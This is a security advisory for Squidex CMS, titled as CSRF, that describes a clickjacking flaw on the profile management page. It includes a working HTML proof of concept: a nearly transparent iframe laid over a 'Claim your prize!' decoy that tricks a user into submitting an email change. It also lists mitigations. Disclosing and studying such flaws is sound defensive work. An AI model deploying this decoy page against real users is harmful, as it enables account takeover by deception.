Squidex CMS CSRF

About the Application

Squidex is an open source, headless content management system (CMS) and content management hub providing an API-first platform for managing and delivering content.

About the Finding

A clickjacking weakness consistent with CWE-1021 (Improper Restriction of Rendered UI Layers or Frames) permits framing profile management page due to missing or insufficient anti-framing controls.

PoC || GTFO

Create HTML file with Proof-of-Concept content below and upload into assets. Access the uploaded file directly to observe the HTML page loading with iFrame loading in the profile management page.

<!doctype html>
<html>
<head>
  <meta charset="utf-8">
  <title>Example layout</title>
  <style>
    iframe {
      position: absolute;
      top: 0; left: 0;
      width: 500px; height: 1000px;
      opacity: 0.10;
      z-index: 2;
      border: none; 
    }
    .decoy {
      position: relative;
      width: 500px;
      height: 900px; 
      border: 1px dashed #ccc;
    }
    .controls {
      position: absolute;
      left: 55px;
      top: 395px;
    }
    #btn { position: absolute; padding: 10px 10px; font-size: 10px; left: -9px;
      top: 178px;}   
  </style>
</head>
<body>
  <div class="decoy">
    <h1>Claim your prize!</h1>
    <p>For verification purposes, enter organiser's email below and click Verify</p>
    <div class="controls">
      <input type="text" placeholder="Organiser's email">
            <button id="btn">Verify</button>
    </div>
  </div>
    <iframe src="https://squidex.local/identity-server/account/profile"></iframe>
</body>
</html>

Youtube demonstration video https://www.youtube.com/watch?v=62ay_jrwUcI.

Conclusion

Where profile management operations include email address changes without verification, UI redress can induce state changes with durable security consequences, including account integrity compromise and potential account recovery pivot scenarios. Industry guidance identifies CSP frame-ancestors (preferably frame-ancestors 'none' for sensitive UI) and, where applicable, X-Frame-Options as primary mitigations to prevent clickjacking by disallowing framing.